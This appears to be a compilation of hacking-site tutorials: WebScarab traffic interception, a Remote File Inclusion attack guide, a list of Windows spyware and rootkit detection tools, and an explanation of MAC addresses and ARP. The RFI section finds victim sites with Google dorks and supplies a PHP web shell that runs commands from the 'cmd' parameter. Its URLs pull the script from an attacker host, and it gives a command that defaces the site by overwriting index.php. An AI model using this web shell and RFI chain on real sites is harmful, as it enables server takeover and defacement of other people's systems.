hack webscarab
Here are the steps 
  •  Go to options => Advanced -> Network -> Settings. You will see the dialog as shown in the above screenshot.
  •  Then select the Manual Proxy configuration
  •  Now enter the following values.
  • HTTP proxy - 127.0.0.1 and port - 8008
This sets the WebScarab to intercept any web request by acting as a local proxy. 
Intercepting Web Traffic
Now time for real game, start your WebScarab & you will see the screen as shown below.
webscarab
In the intercept tab, select "Intercept request" and in the left hand side menu select "Get" and "Post" options. WebScarab is now completely ready to intercept the HTTP Get and post requests.

Next, launch your browser & type any URL for example, http://google.com. You will see a window in WebScarab that will show the intercepted HTTP Get request as shown below. At this point you can also click on the "Intercept Response" button so that it can also intercept the response that is coming back from the Google web server.
webscarab
That is how simple it is. You can use this technique to analyze any web request and response going in and out of your browser.

But the real power of WebScarab lies in manipulating these request and responses on the fly. Let me tell you this can be very very deadly. If you are able to make the right moves and changes in the HTTP request headers then you can easily modify the headers to send invalid values to the servers. This is very useful in web application penetration testing.


At the end, you can click on the "Summary" tab in the main window of the WebScarab which shows complete details of all the intercepted requests and response as shown in the screen below.
webscarab 
Conclusion

In this startup guide, you have seen how to use WebScarab to intercept the HTTP traffic and analyse them. Rest is upto you how far you can take it.
References

  1. WebScarab - Framework for Intercepting & Manipulating Web Traffic

Remote File Inclusion Tutorial

Contents

 
 
Introduction

RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, I suppose you will know what it is all about and may be able to deploy an attack or two.

RFI is a common vulnerability and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux.
 
 
 
Starting with RFI
 
Lets get it started. The first step is to find vulnerable site, you can easily find them using Google dorks.If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website
 
http://victimsite.com/index.php?page=home
 
As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out. Lets check it out.
 
http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt
 
I have included a custom script "evilscript" in text format from my website, which contains some code.Now, if its a vulnerable website, then any of these 3 things can happen
 
  • Case 1 - You might have noticed that the url consisted of "page=home" had no extension, but I have included an extension in my url,hence the site may give an error like 'failure to include evilscript.txt.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  • Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  • Case 3 - successfull execution :)
 
Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go
 
<?php
echo "<script>alert(U 4r3 0wn3d !!);</script>";
echo "Run command: ".htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);
?>
 
The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So, if you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using 'pwd' and 'ls' commands
 
 http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript
 
What it does is that it sends the command as cmd we put in our script and begins print the working directory and list the documents.Even better you can almost make the page proclaim that you hacked it by using the 'echo' command.
 
 cmd=echo U r pwn3d by xero> index.php
 
It will then re-write the index.php and render it.In case, its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files. Now as expected, we are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the 'wget' function...

I leave the rest to your creativity !
 
 
 
Conclusion
 
In this basic tutorial, Rishabh explains about RFI vulnerability and how to play around with it.

Uncovering Hidden Processes on Windows System

The Real Problem

When you start your PC, lot of processes will be running. Some processes run by default and some are started by you. As you keep installing more and more software's, the process list goes bigger and bigger. Some day it reaches the stage where in it gets difficult to manage those processes and in between if some spyware come and sit on your machine, you can't make out easily until some really bad thing happens.
 
 
Detection Tools

Here I will throw some light on various methods of detecting spyware or any malicious programs running on the computer, starting from basic to advanced level.

Usually startup programs are managed through various registry settings. If you are an expert, then you can edit these registry settings yourself. You can find a good list of startup registry locations here.

Below are the some of very useful tools which can either be used alone or in combination with others.
 
1.MSConfig
The 'msconfig' tool comes with Windows. It not only shows you list of processes which are started by default when you start your computer but also allows you to modify execution of startup processes.

2.HijackThis
This is very good tool which shows all startup entries (processes, BHOs, services..etc) from non-windows applications. This way you can easily find out and knock off suspicious processes.
 
3.Autoruns
One more good tool is Autoruns from Sysinternals. This tool shows all startup entries (processes, services, drivers, Winlogon notify entries, winsock providers etc). Also you can make it to display non-microsoft entries by selecting "Hide microsoft entries" from the options menu.
 
4.Process Explorer
You can use the 'Process Explorer' from SysInternals.com to find out more detailed information about all the running processes.

Once you find the process or DLL, you wants to know if its really spyware or any kind of malware programs. You can find out this by connecting to ProcessLibrary.com. This website provides information about a process or DLL to make out if its legitimate process or not. By the way you can always use Google to find out more information about any suspicious looking process.

5.BHORemover
BHO stands for 'Browser Helper Objects' which are the plugins written for Internet Explorer to enhance its capabilities. But this feature is being misused by many spyware programs which monitor user's browsing habits and also steal the online credentials silently.

To eliminate such BHO's from the computer, I have written a tool called BHORemover which scans and lists all installed BHO's on the system with detailed information. This helps in identifying malicious programs and remove them from the system.
 
6.WinServiceManager
WinServiceManager provides single point of administration for managing various aspects of Windows services. It has got more features and provides better management functionality than built-in Windows service management console. It shows list of non-windows services which allows the user to quickly identify and remove the additional services, most of these are installed by spyware to monitor the activities.
 
7.RemoteDLL
Some of the spywares use the DLLs to monitor and control their life cycle. Usually these DLL's are injected into windows processes such as explorer.exe, winlogon.exe etc to hide their presence. You can remove these DLL's from the process using the RemoteDLL tool.
 
8.Anti Rootkits
All the above mentioned tools are the basic ones to find out more information about running programs. But there are more stealth programs such as rootkits which cannot be detected by normal programs. You need more sophisticated tools to view those programs.

There are couple of rootkit detection tools such as BlackLight from F-Secure, Mcafee's Rootkit Detective, Rootkit Revealer from SysInternals.com and IceSword by PJF. IceSword is very advanced tool among all and it shows all hidden processes, services, drivers, SSDT hooks, messages hooks etc.
 
 
 
Conclusion

Antivirus or Antispyware applications can't always protect you from new malicious programs. You need to defend on your own to protest your own system from these programs. Hope this article has enlightened you to some extent in that direction.
 
 
References
 
    1. HijackThis: Remove the hijacked entries from the system.
    2. Autoruns: System startup entries enumerator and eliminator.
    3. Process Explorer: Dispalys process details including loaded modules.
    4. BHO Remover: Scans and removes installed BHO's from the system. 
    5. WinServiceManager: Manage Windows services at one point
    6. RemoteDLL: Tool to inject or remove the DLL from process
    7. BlackLight: Light rootkit detecttior from F-Secure.
    8. IceSword: Advanced rootkit detection tool.
    9. Rootkit Detective: Rootkit detection tool from McAfee.
    10.Rootkit Revealer: Sysinternal's rootkit detection tool.
    11.IceSword & Rootkit : Using IceSword to detect rootkits.

Tutorial on Basics of NIC, MAC and ARP - Author: Abhinav_Singh

Contents

 
 
Introduction

In this beginners guide, I am going to explain the basic & important terms of computer networks such as NIC, IP Address, MAC & ARP. This will greatly help you set up your network basics right before you look for advanced stuff.
 
 
Often we straight away jump into using tools and learn quickly from the various technical papers but we tend to forget the basics. This often causes us to lose the ground and eventually lose interest in the same. From that perspective, this tutorial will help you get your ground stable on network basics and get going !
 
 
 
Know the Terms - IP Address, NIC, MAC

You must be familiar with the term IP address. Just like your home has a mailing address in the same way any computer or device connected to the internet have a mailing address called the IP address. It can either be static or dynamic. In case its static then it will remain unchanged every time you connect to a network and if its dynamic then a local DHCP server grants you a new IP address every time you connect to internet.

So with machines coming and going on networks, and IP addresses ever changing, how do other computers on your network find Redbeard? The secret (well, not really a secret; just a fact that veteran administrators know so well, they forgot to tell you) is this: every networked device actually has two addresses. One is the IP address, which might or might not change. The other is the MAC address, which is fixed to the device (can be changed too, read more here).

When you connect a computer to your Ethernet LAN, do you know what you're plugging the Ethernet cable into? From the outside, it looks like you're plugging it into a metal case, but you're not. Inside the case is a Network Interface Card (NIC). A NIC is a special hardware card within any networked device (computer, printer, router, etc.) that handles all the technical aspects of sending and receiving data packets over a computer network.

Like your mailing address at home, your computer's NIC has a unique address. This address must be unique, otherwise, network traffic cannot find its way to the right computer.

The distinctive address that identifies a NIC is called the Media Access Control (MAC) address. A MAC address is formatted as a six-byte, hexadecimal number, like this
 
00:90:7F:12:DE:7F
 
A MAC address is a unique character string, and since it identifies a specific physical device -- one individual NIC -- the MAC address, by convention, never changes for the life of the NIC. Two NICs never have the same MAC address (unless some manufacturer screws up royally [which has happened]). Because your NIC's MAC address is permanent, it's often referred to as the "real" or physical address of a computer.
 
 
 
Why do we need IP when we have MAC?
 
Actually MAC address are fixed hence they are not as scalable compared to IP address. IP address have several other features like subnetting and supernetting which gives a logical understanding of the presence of a machine in a network. These facilities are not with the MAC address.

Also MAC address are not routable. The Internet Protocols will not treat them as an address of a source or destination. Hence IP address in many ways simplifies our task.

The malleable IP address gives your network some flexible manageability. The never-changing MAC provides a specific, reliable address for a physical device.

Or you could say, we have the long and the short of it. IP addresses route a packet across the whole global Internet, while MAC addresses help the packet make the small, local hop between hardware devices. Sophisticated networking is possible because each of your networked devices has both a MAC and an IP address.

With that comes the next question, How MAC and IP co-ordinate?
 
 
 
Lets bring up ARP
 
The simple definition that we study in local networking books about ARP is - network layer protocol that is used to convert IP address into MAC address. Lets get into more details,

We began by wondering, "How do devices on a local network become aware of one another?" NICs and MACs are important pieces of the answer, but your network must learn to pair a MAC address with the IP address for the same machine. It does so using a technique called Address Resolution Protocol (in short ARP).

Think of ARP as network roll call. Remember the first day of your college/school? At the beginning of class, the teacher called from a list of names, expecting you to reply when she called yours. She did this to associate your name with your face. Every student heard every name, but answered only to his or her own name. ARP uses a similar technique to associate an IP address to the MAC address.

Let's assign Abhinav the IP address, 192.168.39.101, and suppose his NIC has the MAC address, 00:A0:24:30:2E:13. And suppose he need to send a file to Jaya or more literally, to her computer. When Abhinav attempts to send jaya a file, Abhinav first obtains Jaya's IP address. Upon seeing that the IP address is local (on the same subnetwork), Abhinav knows he is capable of sending the file to her destination, if he learns the "real" (MAC) address associated with that IP address. To learn the MAC address, Abhinav does what your teacher did on the first day of school/college. He calls out to the entire local network asking that the computer with the IP in question reply "Here!" with a MAC address.

Let's say that Jaya has the IP, 192.168.39.148. To find the MAC address for Jaya, Abhinav would send the following (simplified) ARP request:
 
From:
(Abhinav's MAC address)
To:
(Broadcast address)
Packet Content
00:A0:24:30:2E:13 FF:FF:FF:FF:FF:FF Who has 192.168.39.148?
Tell 192.168.39.101.
 
Notice the special address in the "To" field above. That special address (all Fs) is the MAC broadcast address. Anything sent to that address goes to every computer on LAN segment. All those computers receive the message, but ignore it, because it doesn't pertain to them -- with the exception of Jaya. Because Jaya is 192.168.39.148, she replies with her MAC address, like this:
 
From:
(Jaya's MAC address)
To:
(Abhinav's MAC address)
Packet Content
00:A0:24:30:4C:23 00:A0:24:30:2E:13 I have 192.168.39.148
 
This is how Abhinav will finally succeed in finally sending his file (not a love letter) to Jaya after identifying her MAC or physical address. In short Abhinav ARPed Jaya.

Here is a picture to demonstrate this process.
 
network basics 
 
Having successfully ARPed, Abhinav stashes the newly-learned MAC/IP pair in an ARP cache. The ARP cache is a small segment of memory your computer reserves to temporarily store a table of MAC addresses and their associated IP addresses. Your computer keeps this table for efficiency so that it doesn't have to keep broadcasting ARP requests to computers it has already queried. If Abhinav need to send something else to Jaya soon (maybe a love letter this time), Abhinav will obtain Jaya's MAC address from his own ARP cache rather than querying it again.
 
 
 
Conclusion

Hope this tutorial will help you to clear most of your doubts on networks basics. When you have sound basics, you can easily solve bigger problems.